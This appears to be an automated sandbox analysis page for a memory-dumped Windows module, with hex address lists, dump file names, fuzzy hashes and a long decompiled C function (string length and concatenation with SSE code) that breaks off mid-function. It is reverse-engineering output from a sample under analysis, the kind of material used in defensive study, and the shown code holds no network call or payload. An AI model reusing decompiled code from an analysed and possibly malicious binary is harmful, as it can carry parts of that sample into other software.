0x6ea134df
0x6ea134e7
0x6ea134ea
0x6ea134ed
0x6ea134ef
0x6ea134ef
0x6ea134f1
0x00000000
0x00000000
0x6ea134f7
0x6ea134fb
0x6ea13501
0x6ea13501
0x6ea13504
0x6ea13505
0x6ea13507
0x6ea13509
0x00000000
0x00000000
0x6ea1350b
0x6ea1350d
0x6ea1356b
0x00000000
0x6ea1356b
0x6ea1350f
0x6ea1350f
0x6ea13511
0x00000000
0x00000000
0x6ea134ff
0x6ea13500
0x6ea13500
0x6ea13500
0x6ea13501
0x6ea134b0
0x6ea134b3
0x6ea134b5
0x6ea134b7
0x00000000
0x00000000
0x6ea134b9
0x6ea134b9
0x6ea134bb
0x6ea134bb
0x6ea134bc
0x6ea134c1
0x6ea134c5
0x6ea134c7
0x00000000
0x00000000
0x6ea134c9
0x6ea134cd
0x6ea134d0
0x6ea134d2
0x00000000
0x00000000
0x00000000
0x6ea134d2
0x6ea134d4
0x00000000
0x6ea134d4
0x6ea134aa
0x6ea13463
0x00000000
0x6ea13463
0x6ea133de
0x6ea133e0
0x6ea133e4
0x6ea133e4
0x6ea133e7
0x6ea133ff
0x6ea1340f
0x6ea1340f
0x6ea13415
0x6ea13415
0x6ea1341a
0x6ea1341e
0x6ea13422
0x6ea13424
0x00000000
0x00000000
0x6ea1342a
0x6ea1342d
0x6ea1342f
0x00000000
0x00000000
0x6ea13431
0x6ea13437
0x6ea1344c
0x6ea1344c
0x00000000
0x6ea1344c
0x6ea13439
0x6ea1343d
0x6ea1343d
0x6ea13441
0x00000000
0x00000000
0x6ea13443
0x6ea13444
0x6ea1344a
0x00000000
0x00000000
0x00000000
0x6ea1344a
0x00000000
0x6ea1343d
0x6ea13574
0x6ea13577
0x00000000
0x6ea13577
0x6ea133eb
0x6ea133ed
0x6ea133f1
0x6ea133f1
0x6ea133f4
0x6ea133f4
0x6ea133f8
0x00000000
0x00000000
0x6ea133fa
0x6ea133fb
0x6ea133fd
0x00000000
0x00000000
0x00000000
0x6ea133fd
0x00000000
0x6ea133f4
0x6ea1338d
0x6ea13391
0x6ea13391
0x6ea13395
0x00000000
0x00000000
0x6ea13397
0x6ea13398
0x6ea1339e
0x00000000
0x00000000
0x00000000
0x6ea1339e
0x00000000
0x6ea13391
0x6ea1357e
0x6ea13581
0x6ea13584
0x00000000
0x6ea13584
0x6ea1333c
0x6ea1333e
0x6ea13342
0x6ea13342
0x6ea13345
0x6ea13345
0x6ea13349
0x00000000
0x00000000
0x6ea1334b
0x6ea1334c
0x6ea1334e
0x00000000
0x00000000
0x00000000
0x6ea1334e
0x00000000
0x6ea13345
0x6ea13319
0x6ea1331d
0x6ea1331d
0x6ea13321
0x00000000
0x00000000
0x6ea13323
0x6ea13324
0x6ea1332a
0x00000000
0x00000000
0x00000000
0x6ea1332a
0x00000000
0x6ea1331d
0x6ea1358b
0x6ea1358e
0x00000000
0x6ea1358e
0x6ea132c8
0x6ea132cc
0x6ea132cc
0x6ea132ce
0x6ea132d2
0x6ea132d4
0x6ea132d4
0x6ea132d8
0x00000000
0x00000000
0x6ea132da
0x6ea132db
0x6ea132dd
0x00000000
0x00000000
0x00000000
0x6ea132dd
0x00000000
0x6ea132d4
0x6ea13595
0x6ea13599
0x6ea1359d
0x6ea1359f
0x00000000
0x00000000
0x6ea135a5
0x6ea135a9
0x6ea135ad
0x6ea135b1
0x6ea135b5
0x6ea135b5
0x6ea135b7
0x6ea135b9
0x6ea135d2
0x6ea135e2
0x6ea135e2
0x6ea135e8
0x6ea135e8
0x6ea135ed
0x6ea135f1
0x6ea135f5
0x6ea135f7
0x00000000
0x00000000
0x6ea135fd
0x6ea13600
0x6ea13602
0x00000000
0x00000000
0x6ea13608
0x6ea1360e
0x6ea13627
0x6ea13627
0x6ea1362c
0x6ea1362c
0x6ea1362f
0x6ea1362f
0x6ea13631
0x6ea13635
0x6ea13639
0x6ea1363d
0x6ea13644
0x6ea1364d
0x6ea13650
0x6ea13653
0x6ea13659
0x6ea1365c
0x6ea1365f
0x6ea13661
0x00000000
0x00000000
0x6ea13665
0x6ea13667
0x6ea13673
0x6ea13673
0x6ea13677
0x6ea1367b
0x6ea1367b
0x6ea1367d
0x00000000
0x00000000
0x00000000
0x6ea1367d
0x6ea13669
0x6ea1366a
0x6ea1366d
0x00000000
0x00000000
0x00000000
0x6ea1366d
0x6ea1368f
0x6ea13699
0x6ea13699
0x6ea1369a
0x00000000
0x00000000
0x6ea1369c
0x6ea136a5
0x6ea136aa
0x6ea136ad
0x6ea136b1
0x00000000
0x00000000
0x6ea136b3
0x6ea136b7
0x6ea136b7
0x6ea136b8
0x6ea136b9
0x6ea136c3
0x6ea136c9
0x6ea136cc
0x6ea136ce
0x00000000
0x00000000
0x6ea136d0
0x6ea136d3
0x00000000
0x00000000
0x00000000
0x6ea136d5
0x00000000
0x6ea136b7
0x6ea13610
0x6ea13614
0x6ea13614
0x6ea13618
0x00000000
0x00000000
0x6ea1361e
0x6ea1361f
0x6ea13625
0x00000000
0x00000000
0x00000000
0x6ea13625
0x6ea136fa
0x6ea136fa
0x6ea136fc
0x00000000
0x00000000
0x6ea13702
0x00000000
0x00000000
0x6ea13708
0x6ea1370c
0x6ea13710
0x00000000
0x6ea13710
0x6ea13719
0x6ea13720
0x00000000
0x6ea13720
0x6ea135bb
0x6ea135bf
0x6ea135c1
0x6ea135c1
0x6ea135c3
0x6ea135c3
0x6ea135c7
0x00000000
0x00000000
0x6ea135cd
0x6ea135ce
0x6ea135d0
0x00000000
0x00000000
0x00000000
0x6ea135d0
0x00000000
0x6ea136de
0x6ea136de
0x6ea136e2
0x6ea136e6
0x6ea136e6
0x6ea136ee
0x6ea136ee
0x6ea136f2
0x00000000
0x6ea136f2
0x6ea13683
0x6ea13683
0x00000000
0x6ea13687
0x6ea1324e
0x6ea1324f
0x6ea13252
0x00000000
0x00000000
0x00000000
0x6ea13252
0x6ea13724
0x6ea1372e
0x6ea1372e
0x6ea1372f
0x00000000
0x00000000
0x6ea13735
0x6ea1373e
0x6ea13743
0x6ea13746
0x6ea1374a
0x00000000
0x00000000
0x6ea13750
0x6ea13754
0x6ea13754
0x6ea13755
0x6ea13756
0x6ea13760
0x6ea13766
0x6ea13769
0x6ea1376b
0x00000000
0x00000000
0x6ea1376d
0x6ea13770
0x00000000
0x00000000
0x00000000
0x6ea13772
0x00000000
0x6ea13754
0x6ea131ed
0x6ea131f1
0x6ea131f1
0x6ea131f5
0x00000000
0x00000000
0x6ea131fb
0x6ea131fc
0x6ea13202
0x00000000
0x00000000
0x00000000
0x6ea13202
0x6ea13777
0x6ea13777
0x6ea13779
0x00000000
0x00000000
0x6ea1377f
0x00000000
0x00000000
0x6ea13785
0x6ea13789
0x00000000
0x6ea13789
0x6ea13791
0x6ea13798
0x00000000
0x6ea13798
0x6ea13198
0x6ea1319c
0x6ea1319e
0x6ea1319e
0x6ea131a0
0x6ea131a0
0x6ea131a4
0x00000000
0x00000000
0x6ea131aa
0x6ea131ab
0x6ea131ad
0x00000000
0x00000000
0x00000000
0x6ea131ad
0x00000000
0x6ea1379c
0x6ea1379c
0x6ea137a0
0x6ea137a4
0x6ea137a4
0x00000000
0x6ea137ac
0x00000000
0x6ea1303b
0x6ea12fb7
0x6ea12fba
0x6ea12fbc
0x6ea12fbe
0x00000000
0x00000000
0x6ea12fc0
0x6ea12fc4
0x6ea12fc4
0x6ea12fc6
0x6ea12fca
0x6ea12fcd
0x6ea12fcd
0x6ea12fce
0x6ea12fd3
0x6ea12fd7
0x6ea12fd9
0x00000000
0x00000000
0x6ea12fdb
0x6ea12fdf
0x6ea12fe2
0x6ea12fe4
0x00000000
0x00000000
0x00000000
0x6ea12fe4
0x6ea12fe6
0x6ea12fea
0x6ea12fee
0x00000000
0x6ea12fee
0x6ea12fb1
0x6ea12f6f
0x00000000
0x6ea12f6f
0x6ea12eeb
0x6ea12eeb
0x6ea12eee
0x6ea12f06
0x6ea12f0a
0x6ea12f16
0x6ea12f16
0x6ea12f1c
0x6ea12f1c
0x6ea12f21
0x6ea12f25
0x6ea12f29
0x6ea12f2b
0x00000000
0x00000000
0x6ea12f31
0x6ea12f34
0x6ea12f36
0x00000000
0x00000000
0x6ea12f38
0x6ea12f3e
0x6ea12f53
0x6ea12f53
0x6ea12f58
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea12f40
0x6ea12f40
0x6ea12f40
0x6ea12f44
0x00000000
0x00000000
0x6ea12f4a
0x6ea12f4b
0x6ea12f51
0x00000000
0x00000000
0x00000000
0x6ea12f51
0x6ea137b1
0x6ea137b1
0x6ea137b4
0x6ea137c2
0x6ea137b6
0x6ea137b6
0x6ea137b9
0x6ea137b9
0x00000000
0x6ea137b4
0x6ea137cc
0x6ea137cf
0x00000000
0x6ea137cf
0x6ea12ef2
0x6ea12ef4
0x6ea12ef4
0x6ea12ef7
0x6ea12ef7
0x6ea12efb
0x00000000
0x00000000
0x6ea12f01
0x6ea12f02
0x6ea12f04
0x00000000
0x00000000
0x00000000
0x6ea12f04
0x00000000
0x6ea12ef7
0x6ea12ed8
0x00000000
0x6ea12ed8
0x6ea12e8e
0x6ea12eb4
0x6ea12eb4
0x6ea12eb6
0x6ea12eb7
0x6ea12ebc
0x00000000
0x6ea12ebc
0x6ea12e90
0x6ea12e93
0x6ea12e97
0x00000000
0x00000000
0x6ea12e99
0x6ea12e9b
0x6ea12e9b
0x6ea12e9c
0x6ea12ea1
0x6ea12ea7
0x00000000
0x00000000
0x6ea12ea9
0x6ea12ead
0x6ea12eb2
0x00000000
0x00000000
0x00000000
0x6ea12eb2
0x00000000

Strings

@, xrefs: 6EA12EC8

Memory Dump Source

Source File: 00000000.00000002.690396403.000000006E9F1000.00000020.00020000.sdmp, Offset: 6E9F0000, based on PE: true

Associated: 00000000.00000002.690389011.000000006E9F0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.690462400.000000006EA25000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.690472523.000000006EA2B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.690481387.000000006EA2C000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 115c3439d82789a76028cc64ba03a0b0cd7b01c7d0591427b9fbd30026037de6
Instruction ID: 2baa640cd5bd181e080c7667ff05bc34ff4846b15ce4d5a0ba6d008cc5795588
Opcode Fuzzy Hash: 115c3439d82789a76028cc64ba03a0b0cd7b01c7d0591427b9fbd30026037de6
Instruction Fuzzy Hash: 6A52373190C7938BD705CE69C4903AABBE26FC6354F2E865CD8E55B296D730CCC98786

Uniqueness

Uniqueness Score: -1.00%

Function 6EA17660, Relevance: 2.0, Strings: 1, Instructions: 793
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E6EA17660(intOrPtr* __ecx, signed int* _a4, signed int _a8) {
				signed int _v32;
				intOrPtr* _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _t203;
				signed int _t206;
				signed int* _t207;
				signed int* _t216;
				signed int _t217;
				signed int _t219;
				signed int _t221;
				signed int _t222;
				signed int _t225;
				signed int _t226;
				signed int _t227;
				signed int _t228;
				signed int _t229;
				signed int _t230;
				signed int _t231;
				signed int* _t234;
				signed int _t236;
				signed int _t237;
				signed int _t239;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int* _t248;
				signed int _t250;
				signed int _t251;
				signed int _t259;
				signed int _t262;
				void* _t264;
				signed int _t265;
				signed int _t266;
				signed int* _t269;
				signed int _t271;
				signed int _t272;
				signed int _t275;
				signed int _t280;
				signed int* _t281;
				signed int _t284;
				signed int _t286;
				signed int _t287;
				signed int _t288;
				signed int _t294;
				signed int _t298;
				signed int _t299;
				signed int _t300;
				intOrPtr _t303;
				signed int _t304;
				signed int _t305;
				signed int _t306;
				signed int _t308;
				signed int _t309;
				signed int _t311;
				signed int _t312;
				signed int _t313;
				signed int _t314;
				signed int _t315;
				signed int* _t316;
				signed int _t324;
				signed int _t326;
				unsigned int _t331;
				signed int _t333;
				signed int* _t335;
				signed int _t337;
				signed int* _t339;
				char _t340;
				char _t341;
				signed int _t343;
				intOrPtr* _t344;
				signed int _t345;
				signed int _t346;
				signed int _t347;
				signed int _t349;
				void* _t350;
				signed int _t351;
				signed int _t352;
				signed int _t353;
				signed int _t359;
				signed int _t361;
				signed int _t363;
				signed int _t365;
				signed int _t366;
				signed int _t367;
				unsigned int _t372;
				signed int _t374;
				signed int* _t376;
				signed int _t377;
				signed int _t378;
				intOrPtr* _t380;
				intOrPtr* _t382;
				signed int _t383;
				signed int _t384;
				signed int _t385;
				intOrPtr* _t386;
				void* _t387;
				signed int _t388;
				intOrPtr* _t390;
				unsigned int _t396;
				signed int _t398;
				void* _t399;
				signed int _t400;
				signed int _t401;
				intOrPtr _t402;
				signed int _t403;
				signed int _t404;
				signed int _t407;
				signed int _t414;
				signed int _t415;
				signed int _t422;
				signed int _t428;
				signed int _t429;
				unsigned int _t434;
				signed int _t437;
				void* _t439;
				void* _t441;

				_t439 = (_t437 & 0xfffffff0) - 0x34;
				_t390 = __ecx;
				_t303 =  *__ecx;
				if(_t303 != 0) {
					_t343 =  *( *( *(__ecx + 4)));
					__eflags = _t343;
					if(_t343 == 0) {
						L35:
						_push(0x40);
						_t284 = E6EA01030();
						_t439 = _t439 + 4;
						__eflags =  *_t390 - 1;
						 *_t284 = 0;
						if( *_t390 <= 1) {
							goto L203;
						} else {
							_t415 = 0x40;
							goto L37;
						}
					} else {
						__eflags =  *_t343;
						if( *_t343 == 0) {
							goto L35;
						} else {
							_t262 = _t343 & 0x0000000f;
							__eflags = _t262;
							if(_t262 == 0) {
								L16:
								asm("pxor xmm0, xmm0");
								_t294 =  ~( ~_t262 + 0x0000000f & 0x0000000f) + 0x7fffffff;
								__eflags = _t294;
								_v64 = _t294;
								_t429 = _t294;
								while(1) {
									asm("movdqu xmm1, [edx+eax]");
									asm("pcmpeqb xmm1, xmm0");
									asm("pmovmskb ebx, xmm1");
									__eflags = _t294;
									if(_t294 != 0) {
										break;
									}
									_t262 = _t262 + 0x10;
									__eflags = _t262 - _t429;
									if(_t262 < _t429) {
										continue;
									} else {
										_v64 = _t429;
										__eflags = _v64 - 0x7fffffff;
										if(_v64 >= 0x7fffffff) {
											L23:
											_v64 = 0x7fffffff;
										} else {
											_t275 = _t429;
											while(1) {
												__eflags =  *((char*)(_t275 + _t343));
												if( *((char*)(_t275 + _t343)) == 0) {
													break;
												}
												_t275 = _t275 + 1;
												__eflags = _t275 - 0x7fffffff;
												if(_t275 < 0x7fffffff) {
													continue;
												} else {
													goto L23;
												}
												goto L24;
											}
											_v64 = _t275;
										}
									}
									goto L24;
								}
								asm("bsf ebx, ebx");
								_v64 = _t294 + _t262;
							} else {
								_v64 = 0;
								_t299 = _v64;
								_t262 =  ~_t262 + 0x10;
								__eflags = _t262;
								while(1) {
									__eflags =  *((char*)(_t299 + _t343));
									if( *((char*)(_t299 + _t343)) == 0) {
										break;
									}
									_t299 = _t299 + 1;
									__eflags = _t299 - _t262;
									if(_t299 < _t262) {
										continue;
									} else {
										goto L16;
									}
									goto L24;
								}
								_v64 = _t299;
							}
							L24:
							_t264 = _v64 + 1;
							__eflags = _t264 - 0x40;
							_t265 =  <=  ? 0x40 : _t264;
							__eflags = _t265;
							if(_t265 > 0) {
								_t434 = (_t265 >> 5 >> 0x1a) + _t265 >> 6;
								_t266 = _t265 & 0x8000003f;
								__eflags = _t266;
								if(_t266 < 0) {
									_t266 = (_t266 - 0x00000001 | 0xffffffc0) + 1;
									__eflags = _t266;
								}
								__eflags = _t266;
								_t415 = _t434 + (0 | _t266 > 0x00000000) << 6;
								_push(_t415);
								_v68 = _t343;
								_t269 = E6EA01030();
								_t385 = _v68;
								_t339 = _t269;
								_t439 = _t439 + 4;
								_v60 = 0;
								_v44 = _t339;
								_v36 = _t390;
								 *_t339 = 0;
								_v68 =  *_t390;
								_t298 = _v60;
								_t404 = _v64;
								while(1) {
									_t271 =  *_t385;
									_t298 = _t298 + 1;
									 *_t339 = _t271;
									__eflags = _t404;
									if(_t404 == 0) {
										goto L33;
									}
									__eflags = _t298 - _t404;
									if(_t298 == _t404) {
										_t284 = _v44;
										_t272 = _v68;
										_t390 = _v36;
										_t339[0] = 0;
									} else {
										goto L33;
									}
									L206:
									__eflags = _t272 - 1;
									if(_t272 > 1) {
										goto L37;
									} else {
										goto L157;
									}
									goto L200;
									L33:
									__eflags = _t271;
									if(_t271 == 0) {
										_t284 = _v44;
										_t272 = _v68;
										_t390 = _v36;
									} else {
										_t339 =  &(_t339[0]);
										_t385 = _t385 + 1;
										__eflags = _t385;
										continue;
									}
									goto L206;
								}
							} else {
								_t284 = 0;
								__eflags = _t303 - 1;
								if(_t303 <= 1) {
									L203:
									_t344 = _a4;
									_t203 = 0;
									 *_t344 = 0;
									 *((intOrPtr*)(_t344 + 4)) = 0;
									__eflags = _t284;
									if(_t284 == 0) {
										goto L191;
									} else {
										goto L158;
									}
								} else {
									_t415 = 0;
									L37:
									_t308 = _a8 & 0x0000000f;
									asm("pxor xmm0, xmm0");
									_t359 =  ~_t308 + 0x10;
									__eflags = _t359;
									_v52 = _t359;
									_v56 = _t308;
									_v48 = _t415;
									_v36 = _t390;
									_t400 = 1;
									goto L38;
									do {
										do {
											do {
												L38:
												__eflags = _a8;
												if(_a8 != 0) {
													_t363 = _a8;
													__eflags =  *_t363;
													if( *_t363 != 0) {
														__eflags = _t284 - _a8;
														if(_t284 != _a8) {
															_t229 = _v56;
															__eflags = _t229;
															if(_t229 == 0) {
																L46:
																asm("pxor xmm1, xmm1");
																_t422 =  ~( ~_t229 + 0x0000000f & 0x0000000f) + 0x7fffffff;
																__eflags = _t422;
																while(1) {
																	asm("movdqu xmm0, [ecx+eax]");
																	asm("pcmpeqb xmm0, xmm1");
																	asm("pmovmskb edx, xmm0");
																	__eflags = _t363;
																	if(_t363 != 0) {
																		break;
																	}
																	_t229 = _t229 + 0x10;
																	__eflags = _t229 - _t422;
																	if(_t229 < _t422) {
																		continue;
																	} else {
																		__eflags = _t422 - 0x7fffffff;
																		if(_t422 >= 0x7fffffff) {
																			L53:
																			_t422 = 0x7fffffff;
																		} else {
																			_t363 = _a8;
																			while(1) {
																				__eflags =  *((char*)(_t422 + _t363));
																				if( *((char*)(_t422 + _t363)) == 0) {
																					goto L54;
																				}
																				_t422 = _t422 + 1;
																				__eflags = _t422 - 0x7fffffff;
																				if(_t422 < 0x7fffffff) {
																					continue;
																				} else {
																					goto L53;
																				}
																				goto L54;
																			}
																		}
																	}
																	goto L54;
																}
																asm("bsf esi, edx");
																_t422 = _t422 + _t229;
															} else {
																_t229 = _v52;
																_t422 = 0;
																__eflags = 0;
																_t324 = _a8;
																_t363 = _t229;
																while(1) {
																	__eflags =  *((char*)(_t422 + _t324));
																	if( *((char*)(_t422 + _t324)) == 0) {
																		break;
																	}
																	_t422 = _t422 + 1;
																	__eflags = _t422 - _t363;
																	if(_t422 < _t363) {
																		continue;
																	} else {
																		_v52 = _t363;
																		goto L46;
																	}
																	goto L54;
																}
																_v52 = _t363;
															}
															L54:
															__eflags = _t284;
															if(_t284 == 0) {
																_t311 = 0;
															} else {
																_t239 = _t284 & 0x0000000f;
																__eflags = _t239;
																if(_t239 == 0) {
																	L59:
																	asm("pxor xmm1, xmm1");
																	_t311 =  ~( ~_t239 + 0x0000000f & 0x0000000f) + 0x7fffffff;
																	__eflags = _t311;
																	while(1) {
																		asm("movdqu xmm0, [ebx+eax]");
																		asm("pcmpeqb xmm0, xmm1");
																		asm("pmovmskb edx, xmm0");
																		__eflags = _t363;
																		if(_t363 != 0) {
																			break;
																		}
																		_t239 = _t239 + 0x10;
																		__eflags = _t239 - _t311;
																		if(_t239 < _t311) {
																			continue;
																		} else {
																			__eflags = _t311 - 0x7fffffff;
																			if(_t311 >= 0x7fffffff) {
																				L65:
																				_t311 = 0x7fffffff;
																			} else {
																				while(1) {
																					__eflags =  *((char*)(_t311 + _t284));
																					if( *((char*)(_t311 + _t284)) == 0) {
																						goto L66;
																					}
																					_t311 = _t311 + 1;
																					__eflags = _t311 - 0x7fffffff;
																					if(_t311 < 0x7fffffff) {
																						continue;
																					} else {
																						goto L65;
																					}
																					goto L66;
																				}
																			}
																		}
																		goto L66;
																	}
																	asm("bsf ecx, edx");
																	_t311 = _t311 + _t239;
																} else {
																	_t311 = 0;
																	_t239 =  ~_t239 + 0x10;
																	__eflags = _t239;
																	while(1) {
																		__eflags =  *((char*)(_t311 + _t284));
																		if( *((char*)(_t311 + _t284)) == 0) {
																			goto L66;
																		}
																		_t311 = _t311 + 1;
																		__eflags = _t311 - _t239;
																		if(_t311 < _t239) {
																			continue;
																		} else {
																			goto L59;
																		}
																		goto L66;
																	}
																}
															}
															L66:
															_t55 = _t311 + 1; // 0x80000000
															_t312 = _t422 + _t55;
															__eflags = _t312;
															if(_t312 != 0) {
																__eflags = _t312 - 0x40;
																_t313 =  <=  ? 0x40 : _t312;
																__eflags = _t313 - _v48;
																if(_t313 > _v48) {
																	goto L71;
																}
																goto L83;
															} else {
																__eflags = _t284;
																if(_t284 == 0) {
																	__eflags = _v48 - 0x40;
																	if(_v48 >= 0x40) {
																		goto L97;
																	} else {
																		goto L213;
																	}
																	goto L225;
																} else {
																	 *_t284 = 0;
																	_t365 = 0;
																	__eflags = _v48 - 0x40;
																	if(_v48 < 0x40) {
																		L213:
																		_t313 = 0x40;
																		L71:
																		_t372 = (_t313 >> 5 >> 0x1a) + _t313 >> 6;
																		_v48 = _t372;
																		_t315 = _t313 & 0x8000003f;
																		__eflags = _t315;
																		if(_t315 < 0) {
																			_t315 = (_t315 - 0x00000001 | 0xffffffc0) + 1;
																			__eflags = _t315;
																		}
																		__eflags = _t315;
																		_t374 = _t372 + (0 | _t315 > 0x00000000) << 6;
																		_v48 = _t374;
																		_push(_t374);
																		_t234 = E6EA01030();
																		_v68 = _t234;
																		_t439 = _t439 + 4;
																		__eflags = _t284;
																		if(_t284 == 0) {
																			 *_t234 = 0;
																		} else {
																			__eflags = _v68;
																			if(_v68 != 0) {
																				_t376 = _t234;
																				_t236 =  *_t284;
																				 *_t376 = _t236;
																				__eflags = _t236;
																				if(_t236 != 0) {
																					_v32 = _t400;
																					_t237 = 0;
																					__eflags = 0;
																					_t316 = _t376;
																					while(1) {
																						_t237 = _t237 + 1;
																						_t377 =  *((char*)(_t284 + _t237 * 2 - 1));
																						 *(_t316 + _t237 * 2 - 1) = _t377;
																						__eflags = _t377;
																						if(_t377 == 0) {
																							break;
																						}
																						_t378 =  *((char*)(_t284 + _t237 * 2));
																						 *(_t316 + _t237 * 2) = _t378;
																						__eflags = _t378;
																						if(_t378 != 0) {
																							continue;
																						}
																						break;
																					}
																					_t400 = _v32;
																				}
																			}
																			_push(1);
																			_push(_t284);
																			E6EA010B0();
																			_t439 = _t439 + 8;
																		}
																		_t284 = _v68;
																		L83:
																		_t314 = _t284;
																		__eflags = _t284;
																		if(_t284 != 0) {
																			_t365 =  *_t284;
																			goto L85;
																		}
																	} else {
																		_t314 = _t284;
																		L85:
																		__eflags = _t365;
																		if(_t365 != 0) {
																			_t367 = 0;
																			__eflags = 0;
																			while(1) {
																				_t367 = _t367 + 1;
																				_t231 = _t284 + _t367 * 2;
																				__eflags =  *(_t231 - 1);
																				_t78 = _t231 - 1; // -1
																				_t314 = _t78;
																				if( *(_t231 - 1) == 0) {
																					goto L89;
																				}
																				_t314 = _t231;
																				__eflags =  *_t231;
																				if( *_t231 != 0) {
																					continue;
																				}
																				goto L89;
																			}
																		}
																		L89:
																		_t366 = _t314;
																		__eflags = _t422;
																		if(__eflags != 0) {
																			if(__eflags > 0) {
																				goto L92;
																			}
																		} else {
																			_t422 = 0x7fffffff;
																			L92:
																			_v32 = _t400;
																			_t230 = 0;
																			__eflags = 0;
																			_v44 = _t284;
																			_t401 = _a8;
																			while(1) {
																				_t287 =  *((char*)(_t230 + _t401));
																				 *(_t230 + _t366) = _t287;
																				__eflags = _t287;
																				if(_t287 == 0) {
																					break;
																				}
																				_t85 = _t366 + 1; // 0x1
																				_t314 = _t230 + _t85;
																				_t230 = _t230 + 1;
																				__eflags = _t230 - _t422;
																				if(_t230 < _t422) {
																					continue;
																				}
																				break;
																			}
																			_t400 = _v32;
																			_t284 = _v44;
																		}
																		 *_t314 = 0;
																	}
																}
															}
														}
													}
												}
												L97:
												_t309 =  *(_v36 + 4);
												_t361 =  *( *(_t309 + _t400 * 4));
												__eflags = _t361;
												if(_t361 == 0) {
													goto L99;
												} else {
													__eflags =  *_t361;
													if( *_t361 != 0) {
														__eflags = _t361 - _t284;
														if(_t361 == _t284) {
															goto L99;
														} else {
															_t225 = _t361 & 0x0000000f;
															__eflags = _t225;
															if(_t225 == 0) {
																L106:
																asm("pxor xmm1, xmm1");
																_t428 =  ~( ~_t225 + 0x0000000f & 0x0000000f) + 0x7fffffff;
																__eflags = _t428;
																while(1) {
																	asm("movdqu xmm0, [edx+eax]");
																	asm("pcmpeqb xmm0, xmm1");
																	asm("pmovmskb ecx, xmm0");
																	__eflags = _t309;
																	if(_t309 != 0) {
																		break;
																	}
																	_t225 = _t225 + 0x10;
																	__eflags = _t225 - _t428;
																	if(_t225 < _t428) {
																		continue;
																	} else {
																		__eflags = _t428 - 0x7fffffff;
																		if(_t428 >= 0x7fffffff) {
																			L112:
																			_t428 = 0x7fffffff;
																		} else {
																			while(1) {
																				__eflags =  *((char*)(_t428 + _t361));
																				if( *((char*)(_t428 + _t361)) == 0) {
																					goto L113;
																				}
																				_t428 = _t428 + 1;
																				__eflags = _t428 - 0x7fffffff;
																				if(_t428 < 0x7fffffff) {
																					continue;
																				} else {
																					goto L112;
																				}
																				goto L113;
																			}
																		}
																	}
																	goto L113;
																}
																asm("bsf esi, ecx");
																_t428 = _t428 + _t225;
															} else {
																_t428 = 0;
																_t225 =  ~_t225 + 0x10;
																__eflags = _t225;
																while(1) {
																	__eflags =  *((char*)(_t428 + _t361));
																	if( *((char*)(_t428 + _t361)) == 0) {
																		goto L113;
																	}
																	_t428 = _t428 + 1;
																	__eflags = _t428 - _t225;
																	if(_t428 < _t225) {
																		continue;
																	} else {
																		goto L106;
																	}
																	goto L113;
																}
															}
															L113:
															__eflags = _t284;
															if(_t284 == 0) {
																_t226 = 0;
															} else {
																_t337 = _t284 & 0x0000000f;
																__eflags = _t337;
																if(_t337 == 0) {
																	L118:
																	asm("pxor xmm1, xmm1");
																	_v32 = _t400;
																	_t226 =  ~( ~_t337 + 0x0000000f & 0x0000000f) + 0x7fffffff;
																	__eflags = _t226;
																	while(1) {
																		asm("movdqu xmm0, [ebx+ecx]");
																		asm("pcmpeqb xmm0, xmm1");
																		asm("pmovmskb edi, xmm0");
																		__eflags = _t400;
																		if(_t400 != 0) {
																			break;
																		}
																		_t337 = _t337 + 0x10;
																		__eflags = _t337 - _t226;
																		if(_t337 < _t226) {
																			continue;
																		} else {
																			_t400 = _v32;
																			__eflags = _t226 - 0x7fffffff;
																			if(_t226 >= 0x7fffffff) {
																				L124:
																				_t226 = 0x7fffffff;
																			} else {
																				while(1) {
																					__eflags =  *((char*)(_t226 + _t284));
																					if( *((char*)(_t226 + _t284)) == 0) {
																						goto L125;
																					}
																					_t226 = _t226 + 1;
																					__eflags = _t226 - 0x7fffffff;
																					if(_t226 < 0x7fffffff) {
																						continue;
																					} else {
																						goto L124;
																					}
																					goto L125;
																				}
																			}
																		}
																		goto L125;
																	}
																	_t259 = _t400;
																	asm("bsf eax, eax");
																	_t400 = _v32;
																	_t226 = _t259 + _t337;
																} else {
																	_t226 = 0;
																	_t337 =  ~_t337 + 0x10;
																	__eflags = _t337;
																	while(1) {
																		__eflags =  *((char*)(_t226 + _t284));
																		if( *((char*)(_t226 + _t284)) == 0) {
																			goto L125;
																		}
																		_t226 = _t226 + 1;
																		__eflags = _t226 - _t337;
																		if(_t226 < _t337) {
																			continue;
																		} else {
																			goto L118;
																		}
																		goto L125;
																	}
																}
															}
															L125:
															_t100 = _t226 + 1; // 0x80000000
															_t227 = _t428 + _t100;
															__eflags = _t227;
															if(_t227 != 0) {
																__eflags = _t227 - 0x40;
																_t228 =  <=  ? 0x40 : _t227;
																__eflags = _t228 - _v48;
																if(_t228 > _v48) {
																	goto L130;
																}
																goto L142;
															} else {
																__eflags = _t284;
																if(_t284 == 0) {
																	__eflags = _v48 - 0x40;
																	if(_v48 >= 0x40) {
																		goto L214;
																	} else {
																		goto L224;
																	}
																} else {
																	 *_t284 = 0;
																	_t242 = 0;
																	__eflags = _v48 - 0x40;
																	if(_v48 < 0x40) {
																		L224:
																		_t228 = 0x40;
																		L130:
																		_t331 = (_t228 >> 5 >> 0x1a) + _t228 >> 6;
																		_v48 = _t331;
																		_t245 = _t228 & 0x8000003f;
																		__eflags = _t245;
																		if(_t245 < 0) {
																			_t245 = (_t245 - 0x00000001 | 0xffffffc0) + 1;
																			__eflags = _t245;
																		}
																		__eflags = _t245;
																		_t333 = _t331 + (0 | _t245 > 0x00000000) << 6;
																		_v48 = _t333;
																		_push(_t333);
																		_v64 = _t361;
																		_t248 = E6EA01030();
																		_t361 = _v64;
																		_v60 = _t248;
																		_t439 = _t439 + 4;
																		__eflags = _t284;
																		if(_t284 == 0) {
																			 *_t248 = 0;
																		} else {
																			__eflags = _v60;
																			if(_v60 != 0) {
																				_t335 = _t248;
																				_t250 =  *_t284;
																				 *_t335 = _t250;
																				__eflags = _t250;
																				if(_t250 != 0) {
																					_v64 = _t361;
																					_t251 = 0;
																					__eflags = 0;
																					_v32 = _t400;
